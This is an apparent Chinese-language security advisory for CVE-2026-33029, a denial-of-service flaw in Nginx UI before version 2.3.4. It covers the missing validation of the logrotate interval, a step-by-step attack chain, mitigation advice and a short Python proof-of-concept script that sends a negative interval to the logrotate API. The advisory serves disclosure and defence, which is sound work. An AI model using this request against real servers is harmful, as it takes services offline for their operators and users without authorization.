CVE-2026-33029 CVSS 6.5 中危

CVE-2026-33029 Nginx UI拒绝服务漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33029

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nginx UI

漏洞概述

Nginx UI是一个用于Nginx服务器的Web用户界面。在2.3.4版本之前，logrotate配置中存在输入验证漏洞。经过身份验证的用户可以通过提交负整数作为轮询间隔，导致后端进入无限循环或无效状态，从而使Web界面无响应，造成完全的拒绝服务。该问题已在2.3.4版本中修复。

技术细节

该漏洞源于logrotate配置功能的输入验证机制缺失。当用户配置日志轮转间隔时，后端未对输入值进行边界检查（如验证是否为正整数）。攻击者利用低权限账户登录后，可构造恶意请求，将轮询间隔参数设置为负数（例如-1）。后端在处理此参数时，逻辑判断失效，导致进程陷入无限循环或触发异常状态，耗尽服务器资源，致使Web UI服务挂起或崩溃，无法继续处理正常请求。

攻击链分析

STEP 1

步骤1

攻击者获取Nginx UI的低权限账户凭证，成功登录Web界面。

STEP 2

步骤2

攻击者导航至日志轮询配置页面，准备修改相关参数。

STEP 3

步骤3

攻击者抓包或直接在前端提交请求，将轮询间隔参数修改为负整数（如-1）。

STEP 4

步骤4

后端服务接收到负整数，未进行校验直接处理，陷入无限循环。

STEP 5

步骤5

Web interface资源耗尽，停止响应，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_dos(target_url, auth_token):
    """
    PoC for CVE-2026-33029: Nginx UI DoS via negative logrotate interval.
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json"
    }
    
    # Malicious payload: negative integer for rotation interval
    payload = {
        "interval": -1
    }
    
    try:
        response = requests.post(f"{target_url}/api/logrotate", json=payload, headers=headers)
        print(f"Response status: {response.status_code}")
        if response.status_code == 500 or response.elapsed.total_seconds() > 10:
            print("[+] Potential DoS triggered: Server hung or returned error.")
    except Exception as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    # Example usage
    exploit_dos("http://127.0.0.1:9000", "your_admin_token_here")

影响范围

Nginx UI < 2.3.4

防御指南

临时缓解措施

在未升级版本前，应严格限制对Nginx UI管理接口的访问权限，仅允许可信内网IP访问，并加强对后端服务的资源监控，一旦发现进程异常及时重启。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表